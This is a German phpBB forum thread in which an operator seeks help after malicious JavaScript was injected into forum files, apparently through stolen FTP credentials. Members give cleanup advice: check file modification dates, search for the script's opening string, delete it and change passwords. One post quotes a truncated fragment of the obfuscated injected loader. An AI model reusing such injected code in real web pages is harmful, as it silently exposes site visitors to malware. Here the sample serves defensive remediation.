php debug fehler und virus warung
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
-
- Mitglied
so,
overall header und overall footer gecheckt. da steht aber das nicht drin, was ich ausm quelltext rauskopiert habe....
ich versteh nur noch bahnhof...
overall header und overall footer gecheckt. da steht aber das nicht drin, was ich ausm quelltext rauskopiert habe....
ich versteh nur noch bahnhof...
-
- Mitglied
hab übrigens die 3.0.5DeepSurfer hat geschrieben:Also ..laut Changelog hast du Forum Version 3.0.0,
Sollte das an dieser Stelle zutreffen, so darf ich mir ein schmunzeln wohl erlauben![]()

weis ned warum da was anderes im changelog steht...
Re: php debug fehler und virus warung
Das sind die Warnmelsungen vom GoogleChrome, die Warnung betrifft die Seite "tenthprofit.ru".storm-rider hat geschrieben:user meiner foren bekommen jetz diverse warnungen!!! z.B.
[ externes Bild ]
Irgend etwas auf deiner Seite ruft was von dort auf, das könnte selbst ein kleines Bild sein, was dort auf dem Server liegt.
Das Script wurde dir dann wohl mit geklautem ftp-zugang in in die Dateien eingefügt,storm-rider hat geschrieben:meinst du dieses skript?<script>var q=false;E=[];this.p=8420;this.p++;var P;Nc=12864;Nc++;var ue=["Q","j","Zz"];U=function(){this.wW="";var yc=742;var aA=["su","uw","G"];suy=65128;suy+=65;function a(l,g,n){var gM=["AY"];return l.substr(g,n);}sA=12399;sA-=112;this.QG=22173;this.QG-=9;var Z=RegExp;this.r=58264;this.r--;var _E={Hj:43730};var o='';vR={k:44051};var qh=35135;var X=String("/paip"+"ai-co"+a("m/goozAkX",0,5)+a("gle.cZwH",0,5)+a("XCFom/zeCFX",3,5)+a("uk3do.cok3u",3,5)+a("m.phpQ9Y",0,5)); [Script gekürzt - Dr.Death]
eigenen Rechner überprüfen, sämtliche ftp-passwörter ändern
Hatte dieses Script vor einiger Zeit auch mal drin, war in verschiedenen index-Dateien auf unterschiedlichen Servern, also auch bei anderen Seiten mal schauen, wenn du mehrere ftp-zugänge hast.
Das einfügen des Scripts erfolgte nicht beim hochladen, denn das Änderungsdatum entsprach nicht dem Zeitpunkt des hochladens, sondern später. Aber richtig, es liegt am infizierten PC des Forenbetreibers --> geklaute Zugangsdaten/Passwörter.diese Art von "Virus" Problem liegt zu 99% am infizierten PC des Forenbetreibers.
Der Virus befällt alle PHP / HTML Dateien. Beim Hochladen der Dateien auf dem Webserver wird der Virus eingeschleust.
-
- Mitglied
hallo macmoldis,
find ich supi das sich wer gefunden hat, der das selbe problem hatte!!
(sorry, das klingt jetz fies, aber ich denke du weist wie ich es meine..)
kannst du mir sagen wie ich das los werde??? bitte bitte???
ja du hast recht, es lief über den FTP zugang am PC, hab dann gleich das
passwort geändert. auf dem FTP laufen 4 Foren, die wohl alle befallen sind.
kannst mir helfen? wo muss ich danach suchen? bzw. wie kann ich es aus
den entsprechenden dateien entfernen??
find ich supi das sich wer gefunden hat, der das selbe problem hatte!!
(sorry, das klingt jetz fies, aber ich denke du weist wie ich es meine..)
kannst du mir sagen wie ich das los werde??? bitte bitte???
ja du hast recht, es lief über den FTP zugang am PC, hab dann gleich das
passwort geändert. auf dem FTP laufen 4 Foren, die wohl alle befallen sind.
kannst mir helfen? wo muss ich danach suchen? bzw. wie kann ich es aus

Re: php debug fehler und virus warung
Ich hatte als erstes anhand des Erstellungs/Änderungsdatum geschaut, welche Datei wann geändert wurden.storm-rider hat geschrieben:kannst mir helfen? wo muss ich danach suchen? bzw. wie kann ich es aus
Da ich wußte, wann ich die letzen hochgeladen hatte war es relativ einfach, die erst kürzlich geänderten heraus zu finden. Außerdem hatte ich ja auch sofort die Meldungen von Usern, war also auch relativ einfach die betreffenden Datein zu finden.
Aber zur endgültigen Sicherheit habe ich alle Dateien heruntergeladen, die Suche nach dem Text beispielsweise "<script>var q=false" oder etwas anderes markantes aus dem Script über die Dateien laufen lassen. Und da der Virenscanner bei dem Script anschlug, so auch diesen anschließend noch mal drüber.
Wie entfernen?
Tja wenn die Dateien gefunden, diese im Text-Editor öffnen und das Script löschen. in fast allen Fällen stand dies in der ersten Zeile, einmal nur in der letzten.
Anschließend die geänderten Dateien wieder hochladen.
Was die Google-Chrome Warnung betrifft, schauen was auf der Datei bei der diese Meldung auftritt, die Verbindung zu "tenthprofit.ru", im Quelltext schauen, kann auch ein Bild, welches so keinen Schaden anrichtet, die Meldung kommt aber weil es eben auf dem Server von "tenthprofit.ru" liegt.
Was das erstgenannte Script für einen Schaden anrichtet ist mir nicht bekannt, da ja eben verschlüsselt, gibt aber Programme die das auch entschlüsseln, habe mich aber nach der Entfernung und da nun wieder Ruhe eingetreten ist, nicht weiter damit befasst.
Nachtrag:
neben dem Ändern der Passwörter natürlich auch das Sicherheitsloch suchen,
eventuell Rechner neu aufsetzen
-
- Mitglied
hallo,
danke für die hilfe, das werd ich mir dann heut abend gleich mal ansehen. auf die sache mit dem änderungsdatum wäre ich nicht gekommen!!
wg. sicherheitsloch aufm rechner.. mein virusmelder hat den ja angezeigt, aber anscheinend is der trotzdem durchgekommen.
werd ich ums neu aufsetzen wohl ned rum kommen... is auch ned so tragisch, würd halt
zumindest gern die foren retten!!
DANKe nochmal, ich meld mich wieder wenns was neues gibt.
danke für die hilfe, das werd ich mir dann heut abend gleich mal ansehen. auf die sache mit dem änderungsdatum wäre ich nicht gekommen!!
wg. sicherheitsloch aufm rechner.. mein virusmelder hat den ja angezeigt, aber anscheinend is der trotzdem durchgekommen.

zumindest gern die foren retten!!
DANKe nochmal, ich meld mich wieder wenns was neues gibt.
-
- Mitglied
hi ich mal,
hab schon die ersten dateien gefunden!!!
wie sieht es mit files wie editor.js und pngfix.js aus?
die kann ich ja nicht editieren...
- franki
- Ehemaliges Teammitglied
Ich weis ja nicht welchen Editor du verwendest aber der Notepad++ kann alle Files (phpbb) bearbeiten.storm-rider hat geschrieben:hi ich mal,
LG Franki